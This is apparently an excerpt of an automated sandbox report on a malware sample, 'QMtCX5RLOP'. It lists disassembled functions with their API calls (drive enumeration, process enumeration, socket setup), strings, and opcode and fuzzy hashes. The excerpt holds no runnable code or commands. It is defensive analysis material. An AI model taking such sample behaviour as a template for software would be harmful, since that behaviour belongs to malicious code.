                                                            • Opcode ID: 483cfad8b1d9afe8208508b3741d01516a7963d3b17317d4298542949af4dd14
                                                            • Instruction ID: 8da13f5e819bd844e54f20f3f8b902b6c9eb2adcc7b61034514bee9a58a9c087
                                                            • Opcode Fuzzy Hash: 483cfad8b1d9afe8208508b3741d01516a7963d3b17317d4298542949af4dd14
                                                            • Instruction Fuzzy Hash: E2612BEB14C221BD729285822F24EFB576DE5D6730332E427FC07D6906E2984E8E51B2
                                                            Function 06E50129 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 369COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 0ae12f5189e6c0f5c48bbc54b087742c9b87a953dd6e84d9d906ba9769ec6827
                                                            • Instruction ID: d335b5ba83c8b8441561d979434c7e82de9ef0008750d36fd8ac9910988689ee
                                                            • Opcode Fuzzy Hash: 0ae12f5189e6c0f5c48bbc54b087742c9b87a953dd6e84d9d906ba9769ec6827
                                                            • Instruction Fuzzy Hash: 99613AEB14C221BD738285822B24EFB576DE5D6730332E427FC07D6506E2984E8E51B2
                                                            Function 06E50149 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 356COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 8820a47f721a9fb5215ccd10d95ada72f677c443d7a0c0618a3b20628a77af08
                                                            • Instruction ID: 2223147139b415f0ca05b49f99cc6de81817cc2c3c6f795fecc48fbef2f02b61
                                                            • Opcode Fuzzy Hash: 8820a47f721a9fb5215ccd10d95ada72f677c443d7a0c0618a3b20628a77af08
                                                            • Instruction Fuzzy Hash: A0612BEB54C221BD739285822F64EFB576DE5D6730332A427FC07D6506E2980F8E61B2
                                                            Function 06E501BB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 347COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 4282a41b25e02c8de79b013d4a838b2dbdfc3102cadc1c6f009406c15857a0f1
                                                            • Instruction ID: 41d4573123f374a5053d7481126a0e9400131e590bae28da5b7787164bcc0940
                                                            • Opcode Fuzzy Hash: 4282a41b25e02c8de79b013d4a838b2dbdfc3102cadc1c6f009406c15857a0f1
                                                            • Instruction Fuzzy Hash: C8513BEB54C221BD729285822F64AFB576DE5D6730332A42BFC07D6506E2980E8E51B2
                                                            Function 06E50167 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 344COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: fe6fa02ad6825955b00b489ccafc96b62d1569452b85afb9250b48dea5c0d8f1
                                                            • Instruction ID: 442d8766b642c1410da711d28c6e840e7bf2d372056fd2cb1c20e718a55eaa9f
                                                            • Opcode Fuzzy Hash: fe6fa02ad6825955b00b489ccafc96b62d1569452b85afb9250b48dea5c0d8f1
                                                            • Instruction Fuzzy Hash: 19514CEB54C321BDB39285922F24EFB576DE5D6730332A427FC07D6502E2990E8E51B2
                                                            Function 06E501EF Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 336COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: cec97c79295ac7be6594120c88551c90500ca038e51702add354c56b4153221d
                                                            • Instruction ID: b32b14738c5097890212750d1c1dbfbf5a9e68654709c72c508809061446ea39
                                                            • Opcode Fuzzy Hash: cec97c79295ac7be6594120c88551c90500ca038e51702add354c56b4153221d
                                                            • Instruction Fuzzy Hash: 27514BEB24C221BD728285922B24AFB576DE5D6730332E427FC07D6506E2984F8E51B1
                                                            Function 06E50199 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 335COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 997d6393e6a76011d64911a3728518144aaa92613ab6f2c396b6eff4ba7ec6f8
                                                            • Instruction ID: efd862531642fffd11e9d31f0d489761ee8db2a1638a563e1234c1736c3dc929
                                                            • Opcode Fuzzy Hash: 997d6393e6a76011d64911a3728518144aaa92613ab6f2c396b6eff4ba7ec6f8
                                                            • Instruction Fuzzy Hash: AC514CEB14C221BDB38281822B24EFB576DE5D6730332E427FC07D6502E2890E8E51B2
                                                            Function 06E5018C Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 334COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: eab80d3c8ec242cda563ff39458a321449e4852c488d338c82b7db61a1d5447d
                                                            • Instruction ID: d7f5f35e8d350d08b4b61fc735498c3fdd0a7aaf60f994a67d9640dd073768a9
                                                            • Opcode Fuzzy Hash: eab80d3c8ec242cda563ff39458a321449e4852c488d338c82b7db61a1d5447d
                                                            • Instruction Fuzzy Hash: 7A513BEB14C221BDB38285822F24AFB576DE5D6730332E427FC07D6506E2990E8E51B2
                                                            Function 06E501CD Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 328COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 977439aa99de0ab1d5d7653abde7fbffe0563011a07cfeb417393a894b3101be
                                                            • Instruction ID: b36c77d6e95616810263624130e9b178312b466f04fee4397b28cbab03735271
                                                            • Opcode Fuzzy Hash: 977439aa99de0ab1d5d7653abde7fbffe0563011a07cfeb417393a894b3101be
                                                            • Instruction Fuzzy Hash: A0513DEB54C221BD729285522F24EFB576DE5D6730332E427FC07D6506E2980E4E51B1
                                                            Function 06E50209 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: e89b0120e60d01eba0bd39b6a62af0ccd6dbb3083e44fe6ac5435bc2097fed84
                                                            • Instruction ID: 79f820459b59d9beac861c6f97c0d70d8c0ae9b6cf96eb9d1df917aa3edcccc0
                                                            • Opcode Fuzzy Hash: e89b0120e60d01eba0bd39b6a62af0ccd6dbb3083e44fe6ac5435bc2097fed84
                                                            • Instruction Fuzzy Hash: F4513BEB24C221BD739285922B24EFB576DE4D6730332D83BFC07D6506E2894E8E51B1
                                                            Function 06E50234 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 292COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 949f6f0962af668ed6ef051f132765666cf80da5e7ffc1f8fe0c8d04824146fc
                                                            • Instruction ID: 886c9d2999546842858643291d38c9ccb7b826a628debea3209be43091774b10
                                                            • Opcode Fuzzy Hash: 949f6f0962af668ed6ef051f132765666cf80da5e7ffc1f8fe0c8d04824146fc
                                                            • Instruction Fuzzy Hash: 2D511CEB54C321BD739285922F24AFB676DE5D6730332D427FC07D2506E2990E8E61B1
                                                            Function 06E5024F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 289COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: b6c375c9fcf57d921a9213e840f5facb3d12ce5a12ab84f9a1c16721dfd50380
                                                            • Instruction ID: 0c2428c6d8924a01db21b937bbbb2cc804d98ff99bd9b6c70ac09cab1abda388
                                                            • Opcode Fuzzy Hash: b6c375c9fcf57d921a9213e840f5facb3d12ce5a12ab84f9a1c16721dfd50380
                                                            • Instruction Fuzzy Hash: BF512CEB54D221BD739281822F24EFB576DE5D6730332D42BFC07D2506E2884E8E61B1
                                                            Function 00D7A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 00D7A1C7
                                                            Strings
                                                            • getsockname() failed with errno %d: %s, xrefs: 00D7A1F0
                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00D7A23B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3358416759-2605427207
                                                            • Opcode ID: 9abc840494654cb95622cfcf6efb1bf351ee6927f097a33d1c9690149864b824
                                                            • Instruction ID: e04833deca756880ca1905e13f63bbe2b93fbdd76193138db966adc78046633c
                                                            • Opcode Fuzzy Hash: 9abc840494654cb95622cfcf6efb1bf351ee6927f097a33d1c9690149864b824
                                                            • Instruction Fuzzy Hash: A321D831808681BAF6259B1DDC42FE773ACEFD1328F044654FE9853152FA32698587F2
                                                            Function 00D5D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WS2_32(00000202), ref: 00D5D65B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID: if_nametoindex$iphlpapi.dll
                                                            • API String ID: 724789610-3097795196
                                                            • Opcode ID: 4bee574a7867783bbb1d367ac6b6fc01fca759b2140a76a19fa89ef0e2bf435c
                                                            • Instruction ID: a91861aab185d1df5c63e613d45f8d3e88c19f9d2bf2125845fff3690379355e
                                                            • Opcode Fuzzy Hash: 4bee574a7867783bbb1d367ac6b6fc01fca759b2140a76a19fa89ef0e2bf435c
                                                            • Instruction Fuzzy Hash: 6E0170D094034107FB30BF38A82732635D06B91305F49196CDC84A118AF62CC54DC3B3
                                                            Function 00E0AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00E0AB9B
                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00E0ABE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocketsocket
                                                            • String ID:
                                                            • API String ID: 416004797-0
                                                            • Opcode ID: 7f995571b819857dcacf2fe612966ab961ce317997af5da921d25b12ab51acc6
                                                            • Instruction ID: 1974e7cb14116e8a40b8d31d9a1a9027ecfe4c04feaa1a10a713e927b772261d
                                                            • Opcode Fuzzy Hash: 7f995571b819857dcacf2fe612966ab961ce317997af5da921d25b12ab51acc6
                                                            • Instruction Fuzzy Hash: 06E1C0706043059BE720CF24C884B6AB7E5EF85308F185A3CF999AB2D1D775D985CB93
                                                            Function 06E900B6 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 393COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: > km
                                                            • API String ID: 2623510744-3170351591
                                                            • Opcode ID: 872cc3c909e60a3ebe9574ed608918c4c85a0a967c4791e8941df4c960f49ab6
                                                            • Instruction ID: 92158ad38e0ec401c1ea64df1200b0c7a9d6938171421bf2ce578216c7d1e139
                                                            • Opcode Fuzzy Hash: 872cc3c909e60a3ebe9574ed608918c4c85a0a967c4791e8941df4c960f49ab6
                                                            • Instruction Fuzzy Hash: F081E7E714C321BDBBD280456B54AFB276EEFD7730770942EF807C6A42E3944A8A51B1
                                                            Function 06E900D4 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 383COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: > km
                                                            • API String ID: 2623510744-3170351591
                                                            • Opcode ID: 187e478b89ddd949080d495964dc8e6e3d37fd4c3cf2aff2ebcf94f91c362914
                                                            • Instruction ID: 192870356391a963c72d0b4602038c457e2650bce8d4d41eeac88210ff630012
                                                            • Opcode Fuzzy Hash: 187e478b89ddd949080d495964dc8e6e3d37fd4c3cf2aff2ebcf94f91c362914
                                                            • Instruction Fuzzy Hash: A871C8E714C321BDBBD280456B54AFB276EEFD7730770952EF807C6A42E3940A8A51B1
                                                            Function 06E50258 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 296COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 690fa8683bc699b649e7d54a0c7a323b880d8da03575f29ade7a06cac9c0fd72
                                                            • Instruction ID: afb18cc3a02cc86535488cd19fb275ab0f95b58f449e8be666fc753d1e7b8503
                                                            • Opcode Fuzzy Hash: 690fa8683bc699b649e7d54a0c7a323b880d8da03575f29ade7a06cac9c0fd72
                                                            • Instruction Fuzzy Hash: CD515EEB14D221BDB38285512F24EFB676DE5D6730332E86BFC03D2506E2884E8E51B1
                                                            Function 06E50282 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: ace584b18a331ab3483de85a80912c4c40936f9420069cc98a8997ca9d80c1f5
                                                            • Instruction ID: 82807a8ed670440da305b00bb3b490b9dc056f0e467282a21ebc02f0b60b6c17
                                                            • Opcode Fuzzy Hash: ace584b18a331ab3483de85a80912c4c40936f9420069cc98a8997ca9d80c1f5
                                                            • Instruction Fuzzy Hash: A05119EB64D221BE728281522F24EFB576DD5D6730332D82BFC07D2506E2894E8E61B1
                                                            Function 06E502BD Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 36b3b9663356b2469d1f9475392e1e9628a93a3c60a015cf6972c742068f2716
                                                            • Instruction ID: 74b8ad4606971766b6974c3681695f18bb14eeea0e05bbf4ae78ee34d639fb89
                                                            • Opcode Fuzzy Hash: 36b3b9663356b2469d1f9475392e1e9628a93a3c60a015cf6972c742068f2716
                                                            • Instruction Fuzzy Hash: 1F516EEB10C3217EB38285512B68AFA576DE5D6730332D867FC03C5546E2894E8E51B1
                                                            Function 06E5029D Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 272COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: e1712e0e661852909d6e9290a76a5f79055e6beefd51754e6ebc6a4dcb843e3d
                                                            • Instruction ID: fa44908265e19360452841a26ffe1d1c1c2f3572548daebc912a9973bf8b84cf
                                                            • Opcode Fuzzy Hash: e1712e0e661852909d6e9290a76a5f79055e6beefd51754e6ebc6a4dcb843e3d
                                                            • Instruction Fuzzy Hash: D3511BEB60C221BD7282C5422F64EFB576DE5D6730332D86BFC07D2506E2894E8E61B1
                                                            Function 06E502F8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 96a62a4d36d5614443ea99be5347e49d4941024628a1f826aca410d8ae6b6c6c
                                                            • Instruction ID: 0c157b972c5a00d8d1657afccdeba1e67e5da9b813a098e50f186921b4c37904
                                                            • Opcode Fuzzy Hash: 96a62a4d36d5614443ea99be5347e49d4941024628a1f826aca410d8ae6b6c6c
                                                            • Instruction Fuzzy Hash: 02413CEB60C321BE738285522B24AFB576DE5D6730332E877FC07D1506E2894E8E51B1
                                                            Function 06E50332 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 1656ae96066ede3efb5f8cd938d414f1809374e16da22cb1cffdb1ea2beec866
                                                            • Instruction ID: 0eca08e54a68b50ff14a3a83af6eba662b8069cbe1445b13238154c27837f99a
                                                            • Opcode Fuzzy Hash: 1656ae96066ede3efb5f8cd938d414f1809374e16da22cb1cffdb1ea2beec866
                                                            • Instruction Fuzzy Hash: 92314DEB60C321BE738285422B64AFA576DE5E6730332A477FC07D5505E2894E8E51B1
                                                            Function 06E50349 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 6d72d26e269cda7b6b5bc0f5a0993ad22cfff1b0c713dff8aa3a11e412305fee
